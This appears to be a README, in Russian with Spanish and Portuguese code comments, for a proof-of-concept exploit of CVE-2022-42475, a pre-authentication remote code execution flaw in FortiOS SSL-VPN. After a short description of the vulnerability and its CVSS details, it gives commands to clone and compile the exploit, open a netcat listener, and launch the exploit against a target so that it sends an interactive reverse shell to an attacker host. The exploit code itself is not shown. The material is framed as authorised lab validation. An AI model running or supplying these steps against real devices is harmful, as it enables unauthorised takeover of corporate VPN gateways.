
Proof of Concept (PoC) для исследований и контролируемой лабораторной валидации CVE-2022-42475 — критической уязвимости переполнения буфера в куче, затрагивающей сервис SSL-VPN в определённых версиях FortiOS.
Fortinet SSL VPN Pre-Authentication Remote Code Execution
CVE-2022-42475 — это уязвимость переполнения буфера в куче (heap-based buffer overflow) в сервисе SSL VPN FortiOS, которая позволяет неаутентифицированным злоумышленникам удалённо выполнять произвольный код (RCE) с помощью специально crafted HTTP-запросов, направленных на конечную точку /remote/error.
Эта уязвимость активно эксплуатировалась в реальных атаках (0-day) до публикации официального патча.
Следующий скриншот показывает выполнение PoC в авторизованной лабораторной среде:
Вывод показывает выполнение PoC и взаимодействие с экземпляром FortiOS, использованным для тестов.

| Поле | Значение |
|---|
| CVE ID | CVE-2022-42475 |
| CVSS 3.1 | 9.3 (Critical) |
| Вектор | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-122 |
| Обнаружено | Декабрь 2022 |
| Официальный патч | FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16 |
# Clonar o descargar el código fuente
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc
# Compilar
go build -o exploit exploit.go
# O ejecutar directamente
go run exploit.go <target> <port> <reverse_ip> <params>
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]
# En el atacante, iniciar listener
nc -lvnp 80
# Ejecutar el exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i